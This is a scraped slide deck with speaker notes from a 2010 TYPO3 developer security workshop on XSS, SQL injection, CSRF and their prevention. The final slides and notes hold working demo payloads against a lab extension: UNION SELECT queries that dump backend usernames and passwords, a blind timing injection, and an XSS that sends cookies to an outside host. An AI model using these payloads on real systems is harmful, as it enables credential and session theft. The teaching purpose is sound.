TYPO3 Developer Days - Elmshorn 2010   Inspiring
Security Workshop                      sha
T3DD10 Security
 Security flaws versus Security concepts
                 02.07.2010



Helmut Hummel <helmut@typo3.org>
Introduction

Do you ...




                           Inspiring people to
T3DD10 Security Workshop   share
Introduction

Do you ...
   ... know me?




                           Inspiring people to
T3DD10 Security Workshop   sha...
Introduction

Do you ...
   ... know me?

   ... have a working development environment?




                             ...
Introduction

Do you ...
   ... know me?

   ... have a working development environment?

   ... ever heared of XSS?




 ...
Introduction

Do you ...
   ... know me?

   ... have a working development environment?

   ... ever heared of XSS?

   ....
Introduction

Do you ...
   ... know me?

   ... have a working development environment?

   ... ever heared of XSS?

   ....
Introduction

Do you ...
   ... know me?

   ... have a working development environment?

   ... ever heared of XSS?

   ....
Introduction

Do you ...
   ... know me?

   ... have a working development environment?

   ... ever heared of XSS?

   ....
Did you ever hack for




                           Inspiring people to
T3DD10 Security Workshop   share
Security Flaws versus Security Concepts


Agenda
   General Security Concepts

   Hacking / Code Review Session

   Gettin...
What is Security?




                           Inspiring people to
T3DD10 Security Workshop   share
Security is not a state




                           Inspiring people to
T3DD10 Security Workshop   share
What is Security?


Security is a process




                           Inspiring people to
T3DD10 Security Workshop   sh...
What is Security?


Security is a process
   The security of an application must be proven
   over time




              ...
What is Security?


Security is a process
   The security of an application must be proven
   over time

   Security must ...
What is Security?


Security is a process
   The security of an application must be proven
   over time

   Security must ...
What is Security?


Security is a process
   The security of an application must be proven
   over time

   Security must ...
What is Security?


Security is a process
   The security of an application must be proven
   over time

   Security must ...
What is Security?


General Security Concepts




                           Inspiring people to
T3DD10 Security Workshop ...
What is Security?


General Security Concepts
   Minimize Exposure / Least privilege




                                 ...
What is Security?


General Security Concepts
   Minimize Exposure / Least privilege

   Don‘t trust user data, don‘t trus...
What is Security?


General Security Concepts
   Minimize Exposure / Least privilege

   Don‘t trust user data, don‘t trus...
What is Security?


General Security Concepts
   Minimize Exposure / Least privilege

   Don‘t trust user data, don‘t trus...
What is Security?


General Security Concepts
   Minimize Exposure / Least privilege

   Don‘t trust user data, don‘t trus...
What is Security?


General Security Concepts
   Minimize Exposure / Least privilege

   Don‘t trust user data, don‘t trus...
What is Security?


General Security Concepts
   Minimize Exposure / Least privilege

   Don‘t trust user data, don‘t trus...
Cross Site Scripting (XSS)




                           Inspiring people to
T3DD10 Security Workshop   share
Cross Site Scripting


XSS




                           Inspiring people to
T3DD10 Security Workshop   share
Cross Site Scripting


XSS
   Persitent/ non persistent XSS




                                   Inspiring people to
T3D...
Cross Site Scripting


XSS
   Persitent/ non persistent XSS

   Injecting Up / Break out of the current DOM
   context



...
Cross Site Scripting


XSS
   Persitent/ non persistent XSS

   Injecting Up / Break out of the current DOM
   context

  ...
Cross Site Scripting


XSS
   Persitent/ non persistent XSS

   Injecting Up / Break out of the current DOM
   context

  ...
Cross Site Scripting


XSS
   Persitent/ non persistent XSS

   Injecting Up / Break out of the current DOM
   context

  ...
Cross Site Scripting


Preventing XSS




                           Inspiring people to
T3DD10 Security Workshop   share
Cross Site Scripting


Preventing XSS
   Input validation and/or filtering is not enough




                              ...
Cross Site Scripting


Preventing XSS
   Input validation and/or filtering is not enough

   Escape correctly, depending on...
Cross Site Scripting


Preventing XSS
   Input validation and/or filtering is not enough

   Escape correctly, depending on...
Email Header Injection




                           Inspiring people to
T3DD10 Security Workshop   share
Email Header Injection


Email Header Injection
   PHP mail() function and From: header

   Use filter_var($mail, FILTER_VA...
SQL Injection (SQLi)




                           Inspiring people to
T3DD10 Security Workshop   share
SQL Injection


SQLi
   (blind) SQL Injections

   Timing attacs

   UNION SELECT

     Example: union select
     1,2,3,4...
SQL Injection


Prevent SQLi




                           Inspiring people to
T3DD10 Security Workshop   share
SQL Injection


Prevent SQLi
   Prepared Statements / PDO




                               Inspiring people to
T3DD10 Se...
SQL Injection


Prevent SQLi
   Prepared Statements / PDO

   Escaping




                               Inspiring people...
SQL Injection


Prevent SQLi
   Prepared Statements / PDO

   Escaping

   Typecasting (intval), whitelist validation




...
SQL Injection


Prevent SQLi
   Prepared Statements / PDO

   Escaping

   Typecasting (intval), whitelist validation

   ...
Cross Site Request Forgery




                           Inspiring people to
T3DD10 Security Workshop   share
Cross Site Request Forgery


CSRF
   Executing arbitrary actions on behalf of a victim

     <img src="http://bank.com/tra...
Cross Site Request Forgery


Prevent CSRF
   Limiting to POST and checking referrer not
   enough
   Double Submit Cookies...
Application Vulnerabilities


More
Application Vulnerabilities


More
                              Information Disclosure
HTTP Response Splitting

         ...
T3DD10 Security Workshop


Rescources
   PHP-Sicherheit (Christopher Kunz and Stefan
   Esser)

   Essential PHP Security ...
T3DD10 Security Workshop


SQLi Exploit
   http://192.168.100.139/introductionpackage/
   t3dd10/pi1/?
   no_cache=1&tx_co...
T3DD10 Security Workshop


XSS Exploit
   http://192.168.100.139/introductionpackage/
   t3dd10/pi2/?
   no_cache=1&tx_coo...
T3DD10 Security Workshop


XSS Exploit
   bit.ly/bpJzpF

   http://192.168.100.139/introductionpackage/
   t3dd10/pi2/?
  ...
inspiring people to share.
T3DD10 Security Workshop
Upcoming SlideShare
Loading in …5
×

T3DD10 Security Workshop

1,575
-1

Published on

Slides of the T3DD10 Security Workshop

Published in: Technology, News & Politics
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,575
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
0
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide
  • Who already heard of XSS, CSRF

  • since 2005, security since 2008, leader since end 2009
  • since 2005, security since 2008, leader since end 2009
  • since 2005, security since 2008, leader since end 2009
  • since 2005, security since 2008, leader since end 2009
  • since 2005, security since 2008, leader since end 2009
  • since 2005, security since 2008, leader since end 2009
  • since 2005, security since 2008, leader since end 2009
  • since 2005, security since 2008, leader since end 2009


  • Application Security, not personal nor gouvernmental


  • invest in resources taken for security / potential loss when hacked
    =&gt; If a hacker has to invest much more than he get&amp;#x2018;s back, he or she won&amp;#x2018;t attack
    =&gt; Your system is secure
    An application must constantly be improved
    =&gt; As hackers and hacker tools evolve, so the security concepts have to

  • invest in resources taken for security / potential loss when hacked
    =&gt; If a hacker has to invest much more than he get&amp;#x2018;s back, he or she won&amp;#x2018;t attack
    =&gt; Your system is secure
    An application must constantly be improved
    =&gt; As hackers and hacker tools evolve, so the security concepts have to

  • invest in resources taken for security / potential loss when hacked
    =&gt; If a hacker has to invest much more than he get&amp;#x2018;s back, he or she won&amp;#x2018;t attack
    =&gt; Your system is secure
    An application must constantly be improved
    =&gt; As hackers and hacker tools evolve, so the security concepts have to

  • invest in resources taken for security / potential loss when hacked
    =&gt; If a hacker has to invest much more than he get&amp;#x2018;s back, he or she won&amp;#x2018;t attack
    =&gt; Your system is secure
    An application must constantly be improved
    =&gt; As hackers and hacker tools evolve, so the security concepts have to

  • invest in resources taken for security / potential loss when hacked
    =&gt; If a hacker has to invest much more than he get&amp;#x2018;s back, he or she won&amp;#x2018;t attack
    =&gt; Your system is secure
    An application must constantly be improved
    =&gt; As hackers and hacker tools evolve, so the security concepts have to

  • give least information possible (wizard.dat), Hide Files from Webroot, DB Users, Apache User
    User Data: GET,POST,COOKIE, DB?
    Escaping is all about context
    Defense in depth: as many defense lines as reasonable (Gesundheitsakte)
    TYPO3, no private data stored in db or hd, not even images
    authentication through 64bit hash calculated of password
    all data from external db where all is encrypted (decrypted with hash)
    Obscurity: e.g. alternate telnet port; hide source
  • give least information possible (wizard.dat), Hide Files from Webroot, DB Users, Apache User
    User Data: GET,POST,COOKIE, DB?
    Escaping is all about context
    Defense in depth: as many defense lines as reasonable (Gesundheitsakte)
    TYPO3, no private data stored in db or hd, not even images
    authentication through 64bit hash calculated of password
    all data from external db where all is encrypted (decrypted with hash)
    Obscurity: e.g. alternate telnet port; hide source
  • give least information possible (wizard.dat), Hide Files from Webroot, DB Users, Apache User
    User Data: GET,POST,COOKIE, DB?
    Escaping is all about context
    Defense in depth: as many defense lines as reasonable (Gesundheitsakte)
    TYPO3, no private data stored in db or hd, not even images
    authentication through 64bit hash calculated of password
    all data from external db where all is encrypted (decrypted with hash)
    Obscurity: e.g. alternate telnet port; hide source
  • give least information possible (wizard.dat), Hide Files from Webroot, DB Users, Apache User
    User Data: GET,POST,COOKIE, DB?
    Escaping is all about context
    Defense in depth: as many defense lines as reasonable (Gesundheitsakte)
    TYPO3, no private data stored in db or hd, not even images
    authentication through 64bit hash calculated of password
    all data from external db where all is encrypted (decrypted with hash)
    Obscurity: e.g. alternate telnet port; hide source
  • give least information possible (wizard.dat), Hide Files from Webroot, DB Users, Apache User
    User Data: GET,POST,COOKIE, DB?
    Escaping is all about context
    Defense in depth: as many defense lines as reasonable (Gesundheitsakte)
    TYPO3, no private data stored in db or hd, not even images
    authentication through 64bit hash calculated of password
    all data from external db where all is encrypted (decrypted with hash)
    Obscurity: e.g. alternate telnet port; hide source
  • give least information possible (wizard.dat), Hide Files from Webroot, DB Users, Apache User
    User Data: GET,POST,COOKIE, DB?
    Escaping is all about context
    Defense in depth: as many defense lines as reasonable (Gesundheitsakte)
    TYPO3, no private data stored in db or hd, not even images
    authentication through 64bit hash calculated of password
    all data from external db where all is encrypted (decrypted with hash)
    Obscurity: e.g. alternate telnet port; hide source
  • give least information possible (wizard.dat), Hide Files from Webroot, DB Users, Apache User
    User Data: GET,POST,COOKIE, DB?
    Escaping is all about context
    Defense in depth: as many defense lines as reasonable (Gesundheitsakte)
    TYPO3, no private data stored in db or hd, not even images
    authentication through 64bit hash calculated of password
    all data from external db where all is encrypted (decrypted with hash)
    Obscurity: e.g. alternate telnet port; hide source

  • Injecting Up: &quot;&gt; &lt;/script&gt;
    Injecting Down:
    &lt;img src=&quot;...UNTRUSTED DATA HERE...&quot; /&gt;&lt; img src=&quot;javascript:alert(document.cookie)&quot; /&gt;
    &amp;#x201E;You MUST use the escape syntax for the part of the HTML document you&apos;re putting untrusted data into.&amp;#x201C;


  • Injecting Up: &quot;&gt; &lt;/script&gt;
    Injecting Down:
    &lt;img src=&quot;...UNTRUSTED DATA HERE...&quot; /&gt;&lt; img src=&quot;javascript:alert(document.cookie)&quot; /&gt;
    &amp;#x201E;You MUST use the escape syntax for the part of the HTML document you&apos;re putting untrusted data into.&amp;#x201C;


  • Injecting Up: &quot;&gt; &lt;/script&gt;
    Injecting Down:
    &lt;img src=&quot;...UNTRUSTED DATA HERE...&quot; /&gt;&lt; img src=&quot;javascript:alert(document.cookie)&quot; /&gt;
    &amp;#x201E;You MUST use the escape syntax for the part of the HTML document you&apos;re putting untrusted data into.&amp;#x201C;


  • Injecting Up: &quot;&gt; &lt;/script&gt;
    Injecting Down:
    &lt;img src=&quot;...UNTRUSTED DATA HERE...&quot; /&gt;&lt; img src=&quot;javascript:alert(document.cookie)&quot; /&gt;
    &amp;#x201E;You MUST use the escape syntax for the part of the HTML document you&apos;re putting untrusted data into.&amp;#x201C;


  • Injecting Up: &quot;&gt; &lt;/script&gt;
    Injecting Down:
    &lt;img src=&quot;...UNTRUSTED DATA HERE...&quot; /&gt;&lt; img src=&quot;javascript:alert(document.cookie)&quot; /&gt;
    &amp;#x201E;You MUST use the escape syntax for the part of the HTML document you&apos;re putting untrusted data into.&amp;#x201C;


  • Injecting Up: &quot;&gt; &lt;/script&gt;
    Injecting Down:
    &lt;img src=&quot;...UNTRUSTED DATA HERE...&quot; /&gt;&lt; img src=&quot;javascript:alert(document.cookie)&quot; /&gt;
    &amp;#x201E;You MUST use the escape syntax for the part of the HTML document you&apos;re putting untrusted data into.&amp;#x201C;


  • Injecting Up: &quot;&gt; &lt;/script&gt;
    Injecting Down:
    &lt;img src=&quot;...UNTRUSTED DATA HERE...&quot; /&gt;&lt; img src=&quot;javascript:alert(document.cookie)&quot; /&gt;
    &amp;#x201E;You MUST use the escape syntax for the part of the HTML document you&apos;re putting untrusted data into.&amp;#x201C;


  • Input Validation: &amp;#x201E;a&gt;b&amp;#x201C; or &amp;#x201E;Me &amp; you&amp;#x201C;

    twitter attack
    Escape not easy because of the different contexts of HTML

    http://isisblogs.poly.edu/2008/08/16/php-strip_tags-not-a-complete-protection-against-xss/
    &lt;script&gt;...NEVER PUT UNTRUSTED DATA HERE...&lt;/script&gt; directly in a script
    &lt;!--...NEVER PUT UNTRUSTED DATA HERE...--&gt; inside an HTML comment
    &lt;div ...NEVER PUT UNTRUSTED DATA HERE...=test /&gt; in an attribute name
    &lt;...NEVER PUT UNTRUSTED DATA HERE... href=&quot;/test&quot; /&gt; in a tag name

    Contexts: HTML-Element, HTML-Attribute Value, JS-Variable Value, URL Parameter
  • Input Validation: &amp;#x201E;a&gt;b&amp;#x201C; or &amp;#x201E;Me &amp; you&amp;#x201C;

    twitter attack
    Escape not easy because of the different contexts of HTML

    http://isisblogs.poly.edu/2008/08/16/php-strip_tags-not-a-complete-protection-against-xss/
    &lt;script&gt;...NEVER PUT UNTRUSTED DATA HERE...&lt;/script&gt; directly in a script
    &lt;!--...NEVER PUT UNTRUSTED DATA HERE...--&gt; inside an HTML comment
    &lt;div ...NEVER PUT UNTRUSTED DATA HERE...=test /&gt; in an attribute name
    &lt;...NEVER PUT UNTRUSTED DATA HERE... href=&quot;/test&quot; /&gt; in a tag name

    Contexts: HTML-Element, HTML-Attribute Value, JS-Variable Value, URL Parameter
  • Input Validation: &amp;#x201E;a&gt;b&amp;#x201C; or &amp;#x201E;Me &amp; you&amp;#x201C;

    twitter attack
    Escape not easy because of the different contexts of HTML

    http://isisblogs.poly.edu/2008/08/16/php-strip_tags-not-a-complete-protection-against-xss/
    &lt;script&gt;...NEVER PUT UNTRUSTED DATA HERE...&lt;/script&gt; directly in a script
    &lt;!--...NEVER PUT UNTRUSTED DATA HERE...--&gt; inside an HTML comment
    &lt;div ...NEVER PUT UNTRUSTED DATA HERE...=test /&gt; in an attribute name
    &lt;...NEVER PUT UNTRUSTED DATA HERE... href=&quot;/test&quot; /&gt; in a tag name

    Contexts: HTML-Element, HTML-Attribute Value, JS-Variable Value, URL Parameter



  • SELECT title, description, body FROM items WHERE ID = 2 and 1=2
    SELECT title, description, body FROM items WHERE ID = 2 and 1=1

    1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(50),BENCHMARK(5000000,ENCODE(&apos;MSG&apos;,&apos;by 5 seconds&apos;)),null) FROM users WHERE user_id = 1;

    Defense in depth (saltedpw)
    http://localhost:8888/introductionpackage/t3dd10/pi1/?L=1%29%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,username,password,0%20from%20be_users%20where%20admin%20in%281

  • Escaping:
    * use the TYPO3 API for that
    * fullQuoteStr(): &amp;#x2018;&amp;#x2018; are necessary
  • Escaping:
    * use the TYPO3 API for that
    * fullQuoteStr(): &amp;#x2018;&amp;#x2018; are necessary
  • Escaping:
    * use the TYPO3 API for that
    * fullQuoteStr(): &amp;#x2018;&amp;#x2018; are necessary
  • Escaping:
    * use the TYPO3 API for that
    * fullQuoteStr(): &amp;#x2018;&amp;#x2018; are necessary


  • POST can be forged, referrer can be spoofed
    Double Submit Cookies
    *sending session id as cookie and form values
    Downsides: session hijacking, httponly for cookies not valid any more
    Challange-Response:
    *CAPTCHA
    *Re-Authentication (password), confirmation? alert() per javascript klickbar?
    *One-time Token
    Synchronizer Token Pattern
    *Generate one or more random tokens for a session (per session or per request)
    *randomize token variable name (per request downside: browser back button)
    http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet

  • Privilede Escalation
    Session Fixation
    Information Disclosure
    Path Traversal (Files)
    Remote Code Execution
  • Privilede Escalation
    Session Fixation
    Information Disclosure
    Path Traversal (Files)
    Remote Code Execution
  • Privilede Escalation
    Session Fixation
    Information Disclosure
    Path Traversal (Files)
    Remote Code Execution
  • Privilede Escalation
    Session Fixation
    Information Disclosure
    Path Traversal (Files)
    Remote Code Execution
  • Privilede Escalation
    Session Fixation
    Information Disclosure
    Path Traversal (Files)
    Remote Code Execution
  • Privilede Escalation
    Session Fixation
    Information Disclosure
    Path Traversal (Files)
    Remote Code Execution
  • Privilede Escalation
    Session Fixation
    Information Disclosure
    Path Traversal (Files)
    Remote Code Execution




  • sdfasdfdsafdsafdsafasd
  • T3DD10 Security Workshop

    1. 1. TYPO3 Developer Days - Elmshorn 2010 Inspiring Security Workshop sha
    2. 2. T3DD10 Security Security flaws versus Security concepts 02.07.2010 Helmut Hummel <helmut@typo3.org>
    3. 3. Introduction Do you ... Inspiring people to T3DD10 Security Workshop share
    4. 4. Introduction Do you ... ... know me? Inspiring people to T3DD10 Security Workshop share
    5. 5. Introduction Do you ... ... know me? ... have a working development environment? Inspiring people to T3DD10 Security Workshop share
    6. 6. Introduction Do you ... ... know me? ... have a working development environment? ... ever heared of XSS? Inspiring people to T3DD10 Security Workshop share
    7. 7. Introduction Do you ... ... know me? ... have a working development environment? ... ever heared of XSS? ... ever heared of SQLi? Inspiring people to T3DD10 Security Workshop share
    8. 8. Introduction Do you ... ... know me? ... have a working development environment? ... ever heared of XSS? ... ever heared of SQLi? ... ever heared of CSRF? Inspiring people to T3DD10 Security Workshop share
    9. 9. Introduction Do you ... ... know me? ... have a working development environment? ... ever heared of XSS? ... ever heared of SQLi? ... ever heared of CSRF? ... ever found a vulnerability in a TYPO3 extension? Inspiring people to T3DD10 Security Workshop share
    10. 10. Introduction Do you ... ... know me? ... have a working development environment? ... ever heared of XSS? ... ever heared of SQLi? ... ever heared of CSRF? ... ever found a vulnerability in a TYPO3 extension? ... reported your findings to security@typo3.org? Inspiring people to T3DD10 Security Workshop share
    11. 11. Did you ever hack for Inspiring people to T3DD10 Security Workshop share
    12. 12. Security Flaws versus Security Concepts Agenda General Security Concepts Hacking / Code Review Session Getting into details about some vulnerabilitiy types Writing down best practices for TYPO3 developers Inspiring people to T3DD10 Security Workshop share
    13. 13. What is Security? Inspiring people to T3DD10 Security Workshop share
    14. 14. Security is not a state Inspiring people to T3DD10 Security Workshop share
    15. 15. What is Security? Security is a process Inspiring people to T3DD10 Security Workshop share
    16. 16. What is Security? Security is a process The security of an application must be proven over time Inspiring people to T3DD10 Security Workshop share
    17. 17. What is Security? Security is a process The security of an application must be proven over time Security must constantly be improved Inspiring people to T3DD10 Security Workshop share
    18. 18. What is Security? Security is a process The security of an application must be proven over time Security must constantly be improved An application can never be secure ... Inspiring people to T3DD10 Security Workshop share
    19. 19. What is Security? Security is a process The security of an application must be proven over time Security must constantly be improved An application can never be secure ... ... but only not insecure at a particular time Inspiring people to T3DD10 Security Workshop share
    20. 20. What is Security? Security is a process The security of an application must be proven over time Security must constantly be improved An application can never be secure ... ... but only not insecure at a particular time The „costs“ for security must relate to the possible impacts Inspiring people to T3DD10 Security Workshop share
    21. 21. What is Security? General Security Concepts Inspiring people to T3DD10 Security Workshop share
    22. 22. What is Security? General Security Concepts Minimize Exposure / Least privilege Inspiring people to T3DD10 Security Workshop share
    23. 23. What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Inspiring people to T3DD10 Security Workshop share
    24. 24. What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Filter->Validate->Escape never mix them up Inspiring people to T3DD10 Security Workshop share
    25. 25. What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Filter->Validate->Escape never mix them up Defense in depth Inspiring people to T3DD10 Security Workshop share
    26. 26. What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Filter->Validate->Escape never mix them up Defense in depth Positive Security Model (Whitelist) Inspiring people to T3DD10 Security Workshop share
    27. 27. What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Filter->Validate->Escape never mix them up Defense in depth Positive Security Model (Whitelist) Use logging Inspiring people to T3DD10 Security Workshop share
    28. 28. What is Security? General Security Concepts Minimize Exposure / Least privilege Don‘t trust user data, don‘t trust Services Filter->Validate->Escape never mix them up Defense in depth Positive Security Model (Whitelist) Use logging Avoid security by obscurity Inspiring people to T3DD10 Security Workshop share
    29. 29. Cross Site Scripting (XSS) Inspiring people to T3DD10 Security Workshop share
    30. 30. Cross Site Scripting XSS Inspiring people to T3DD10 Security Workshop share
    31. 31. Cross Site Scripting XSS Persitent/ non persistent XSS Inspiring people to T3DD10 Security Workshop share
    32. 32. Cross Site Scripting XSS Persitent/ non persistent XSS Injecting Up / Break out of the current DOM context Inspiring people to T3DD10 Security Workshop share
    33. 33. Cross Site Scripting XSS Persitent/ non persistent XSS Injecting Up / Break out of the current DOM context Injecting Down Inspiring people to T3DD10 Security Workshop share
    34. 34. Cross Site Scripting XSS Persitent/ non persistent XSS Injecting Up / Break out of the current DOM context Injecting Down Stay in the current context, but use the possibiities Inspiring people to T3DD10 Security Workshop share
    35. 35. Cross Site Scripting XSS Persitent/ non persistent XSS Injecting Up / Break out of the current DOM context Injecting Down Stay in the current context, but use the possibiities <img src="javascript:alert(document.cookie)" / > Inspiring people to T3DD10 Security Workshop share
    36. 36. Cross Site Scripting Preventing XSS Inspiring people to T3DD10 Security Workshop share
    37. 37. Cross Site Scripting Preventing XSS Input validation and/or filtering is not enough Inspiring people to T3DD10 Security Workshop share
    38. 38. Cross Site Scripting Preventing XSS Input validation and/or filtering is not enough Escape correctly, depending on the context Inspiring people to T3DD10 Security Workshop share
    39. 39. Cross Site Scripting Preventing XSS Input validation and/or filtering is not enough Escape correctly, depending on the context <script>...NEVER PUT UNTRUSTED DATA HERE...</script> <img src=“... OR HERE ...“ /> ... because then you‘re doomed Inspiring people to T3DD10 Security Workshop share
    40. 40. Email Header Injection Inspiring people to T3DD10 Security Workshop share
    41. 41. Email Header Injection Email Header Injection PHP mail() function and From: header Use filter_var($mail, FILTER_VALIDATE_EMAIL) do not allow chr(10) or chr(13) Inspiring people to T3DD10 Security Workshop share
    42. 42. SQL Injection (SQLi) Inspiring people to T3DD10 Security Workshop share
    43. 43. SQL Injection SQLi (blind) SQL Injections Timing attacs UNION SELECT Example: union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,user name,password,0 from be_users where admin in(1) Check your TypoScript! Inspiring people to T3DD10 Security Workshop share
    44. 44. SQL Injection Prevent SQLi Inspiring people to T3DD10 Security Workshop share
    45. 45. SQL Injection Prevent SQLi Prepared Statements / PDO Inspiring people to T3DD10 Security Workshop share
    46. 46. SQL Injection Prevent SQLi Prepared Statements / PDO Escaping Inspiring people to T3DD10 Security Workshop share
    47. 47. SQL Injection Prevent SQLi Prepared Statements / PDO Escaping Typecasting (intval), whitelist validation Inspiring people to T3DD10 Security Workshop share
    48. 48. SQL Injection Prevent SQLi Prepared Statements / PDO Escaping Typecasting (intval), whitelist validation Using an ORM (extbase, FLOW3, QCodo, ...) Inspiring people to T3DD10 Security Workshop share
    49. 49. Cross Site Request Forgery Inspiring people to T3DD10 Security Workshop share
    50. 50. Cross Site Request Forgery CSRF Executing arbitrary actions on behalf of a victim <img src="http://bank.com/transfer.do? acct=MARIA&amount=100000" width="1" height="1" border="0"> stored CSRF (like XSS) Targeted Emails Requires probably some kind of social engineering Inspiring people to T3DD10 Security Workshop share
    51. 51. Cross Site Request Forgery Prevent CSRF Limiting to POST and checking referrer not enough Double Submit Cookies Challenge-Response Synchronizer Token Pattern No Cross-Site Scripting (XSS) Vulnerabilities
    52. 52. Application Vulnerabilities More
    53. 53. Application Vulnerabilities More Information Disclosure HTTP Response Splitting Path Traversal Privilege Escalation Session Fixation LPAP Injection Remote Code Execution
    54. 54. T3DD10 Security Workshop Rescources PHP-Sicherheit (Christopher Kunz and Stefan Esser) Essential PHP Security (Chris Shiflett) http://www.owasp.org/ http://www.ibm.com/developerworks/ opensource/library/os-php-secure-apps/ index.html http://www.owasp.org/index.php/ Category:OWASP_WebGoat_Project Inspiring people to T3DD10 Security Workshop share
    55. 55. T3DD10 Security Workshop SQLi Exploit http://192.168.100.139/introductionpackage/ t3dd10/pi1/? no_cache=1&tx_coolextension_pi1[showUid]=1%2 0UNION%20SELECT%20uid,%20pid,%20tstamp, %20crdate,%20cruser_id,uid%20as %20t3ver_oid,uid%20as%20t3ver_id,uid%20as %20t3ver_wsid,uid%20as%20t3ver_label,uid%20as %20t3ver_state,%20uid%20as%20t3ver_stage,uid %20as%20t3ver_count,uid%20as %20t3ver_tstamp,uid%20as%20t3_origuid,uid %20as%20sys_language_uid,uid%20as %20l10n_parent,uid%20as %20l10n_diffsource,deleted,disable%20as %20hidden,starttime,endtime,%20usergroup%20as %20fe_group,username%20as
    56. 56. T3DD10 Security Workshop XSS Exploit http://192.168.100.139/introductionpackage/ t3dd10/pi2/? no_cache=1&tx_coolextension_pi2[name]= %22+type%3D%22hidden%22%2F%3E%3Cscript %3Ewindow.location.href+%3D+%27http%3A%2F %2Ftypo3.org%2F%3Fcookie%3D%27+%2B +document.cookie%3B%3C%2Fscript%3E
    57. 57. T3DD10 Security Workshop XSS Exploit bit.ly/bpJzpF http://192.168.100.139/introductionpackage/ t3dd10/pi2/? no_cache=1&tx_coolextension_pi2[name]= %22+type%3D%22hidden%22%2F%3E%3C%2Fform %3E%3Cform+action%3D%22http%3A%2F %2Ftypo3.org%22%3E%3Cinput+type%3D%22text %22+name%3D%22name
    58. 58. inspiring people to share.

    ×